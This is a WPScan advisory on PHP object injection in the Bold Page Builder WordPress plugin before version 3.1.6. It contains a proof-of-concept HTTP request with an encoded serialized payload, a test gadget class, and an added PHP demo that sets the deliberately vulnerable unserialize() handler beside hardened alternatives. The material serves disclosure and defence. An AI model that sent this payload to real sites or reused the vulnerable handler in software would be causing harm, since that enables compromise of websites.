WPVDB-ID: 08EDCE3F-2746-4886-8439-76E44EC76FA8 (wpvulndb, dc11)
History: Aug 02, 2021 - 12:00 a.m.

Bold Page Builder < 3.1.6 - PHP Object Injection

Published: 2021-08-02 00:00:00
dc11
wpscan.com
4
php object injection
plugin vulnerability
unvalidated input

EPSS

0.001

Percentile

42.0%

The bt_bb_get_grid AJAX action of the plugin passes user input into the unserialize() function without any validation or sanitisation, which could lead to PHP Object Injection. Even though the plugin itself did not contain a suitable gadget to fully exploit the issue, other installed plugins on the blog could provide one and allow the issue to be exploited, leading to RCE in some cases. The object injection is possible under the following circumstances:

1. A page exists with a Masonry Post Grid. This post grid is an element that can be added through the page builder inside a column.
2. The attacker must have access to that page.

These requirements are in place because the vulnerable AJAX callback function is protected by a nonce, and this nonce is stored inside the post grid element. The AJAX callback function itself can be called by unauthenticated users, so the nonce only ties a request to a page that exposed it; since that page is readable by any visitor, it does not act as an authorization check.

PoC

1. To simulate a vulnerable gadget chain for the object injection, insert the following class inside bold-builder.php:

    class INJECTED_CLASS {
        public function __destruct() {
            echo "OBJECT INJECTED";
            die();
        }
    }

2. Get the nonce from a page with a Masonry Post Grid (to create one: add/edit a post, switch the editor to Bold Builder, and add the Masonry Post Grid inside a column). The nonce is in the data-bt-bb-masonry-post-grid-nonce attribute of the grid element.

3. Send the following request, placing the nonce from step 2 in the bt-bb-masonry-post-grid-nonce parameter (left empty below; adjust Content-Length to the final body length). The show parameter is the double URL-encoded serialized array a:2:{i:1;O:14:"INJECTED_CLASS":0:{}i:1;s:1:"a";}. If the injection works, the destructor from step 1 runs and the response contains OBJECT INJECTED.

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 245
    Connection: close

    action=bt_bb_get_grid&number=1000&category=&show=a%253A2%253A%257Bi%253A1%253BO%253A14%253A%2522INJECTED_CLASS%2522%253A0%253A%257B%257Di%253A1%253Bs%253A1%253A%2522a%2522%253B%257D&bt-bb-masonry-post-grid-nonce=&post-type=post&offset=0
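The following is an added example, not code from the Bold Page Builder plugin or from the advisory. It models the sink described above (user input passed straight into unserialize() behind a nonce check) together with the PoC payload, and contrasts the vulnerable callback with two hardened forms. All demo_* names, the HTML fragment, the nonce value and the assumption that the callback URL-decodes the parameter once more after PHP's own form parsing are illustrative assumptions; it needs PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

// Added example, not plugin code. Every demo_* name, the HTML fragment and the
// decoding steps are assumptions made for illustration.

// Stand-in for the gadget the PoC adds to bold-builder.php. Instead of echoing
// and calling die(), it records that the destructor ran so the script continues.
class INJECTED_CLASS
{
    public static $fired = false;

    public function __destruct()
    {
        self::$fired = true;
    }
}

// Attacker step: pull the nonce out of the public page that embeds the grid.
function demo_extract_nonce(string $html): ?string
{
    return preg_match('/data-bt-bb-masonry-post-grid-nonce="([0-9a-f]+)"/', $html, $m) ? $m[1] : null;
}

// The serialized array from the PoC. Key 1 appears twice, so the injected object
// is replaced (and therefore destroyed) before unserialize() returns: __destruct()
// fires no matter what the callback later does with the result.
function demo_payload(): string
{
    return 'a:2:{i:1;O:14:"INJECTED_CLASS":0:{}i:1;s:1:"a";}';
}

// The PoC ships it double URL-encoded (%253A and so on). Assumption: PHP's form
// parsing strips one layer and the callback strips the other.
function demo_encoded_payload(): string
{
    return rawurlencode(rawurlencode(demo_payload()));
}

// Vulnerable shape of the callback. The nonce is verified, but a nonce only ties
// the request to a page that exposed it, and that page is readable by anyone.
function demo_vulnerable_get_grid(array $post, string $expected_nonce)
{
    if (($post['bt-bb-masonry-post-grid-nonce'] ?? '') !== $expected_nonce) {
        return null;
    }
    $show = urldecode((string) ($post['show'] ?? ''));
    return unserialize($show);                               // object injection
}

// Hardening A: keep the wire format but forbid class instantiation. Any object in
// the input becomes __PHP_Incomplete_Class, which has no destructor to abuse.
function demo_hardened_allowed_classes(array $post, string $expected_nonce)
{
    if (($post['bt-bb-masonry-post-grid-nonce'] ?? '') !== $expected_nonce) {
        return null;
    }
    $show = urldecode((string) ($post['show'] ?? ''));
    return unserialize($show, ['allowed_classes' => false]);
}

// Hardening B (preferred): do not accept PHP serialization from the client at all.
// Expect JSON and only a flat list of scalar values.
function demo_hardened_json(array $post, string $expected_nonce): ?array
{
    if (($post['bt-bb-masonry-post-grid-nonce'] ?? '') !== $expected_nonce) {
        return null;
    }
    $decoded = json_decode(urldecode((string) ($post['show'] ?? '')), true);
    if (!is_array($decoded)) {
        return null;
    }
    foreach ($decoded as $value) {
        if (!is_scalar($value)) {
            return null;
        }
    }
    return $decoded;
}

// --- Walk-through ------------------------------------------------------------
// Constructed fragment standing in for the post that contains the grid element.
$html  = '<div class="bt_bb_masonry_post_grid" data-bt-bb-masonry-post-grid-nonce="4f1a9c0e2b"></div>';
$nonce = demo_extract_nonce($html);

// The builder reproduces the show= value from the PoC request exactly.
assert(demo_encoded_payload() === 'a%253A2%253A%257Bi%253A1%253BO%253A14%253A%2522INJECTED_CLASS%2522%253A0%253A%257B%257Di%253A1%253Bs%253A1%253A%2522a%2522%253B%257D');

// Simulate $_POST after PHP has removed one encoding layer.
$post = ['action' => 'bt_bb_get_grid', 'show' => urldecode(demo_encoded_payload()), 'bt-bb-masonry-post-grid-nonce' => $nonce];

INJECTED_CLASS::$fired = false;
demo_vulnerable_get_grid($post, $nonce);
echo 'vulnerable:            destructor ' . (INJECTED_CLASS::$fired ? 'fired' : 'did not fire') . PHP_EOL;

INJECTED_CLASS::$fired = false;
demo_hardened_allowed_classes($post, $nonce);
echo 'allowed_classes=false: destructor ' . (INJECTED_CLASS::$fired ? 'fired' : 'did not fire') . PHP_EOL;

var_dump(demo_hardened_json($post, $nonce));                 // NULL: payload is not JSON
var_dump(demo_hardened_json(['show' => '%5B1%2C%22a%22%5D', 'bt-bb-masonry-post-grid-nonce' => $nonce], $nonce));
```

Run it with php on the command line. The vulnerable handler reports that the destructor fired while the allowed_classes variant does not, and the JSON variant rejects the serialized payload but accepts the legitimate list [1,"a"]. Hardening A is the minimal change if the wire format cannot be altered; Hardening B removes the unserialize() sink entirely, which is the fix to prefer, because a future gadget in any other installed plugin would otherwise still be reachable through this endpoint.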
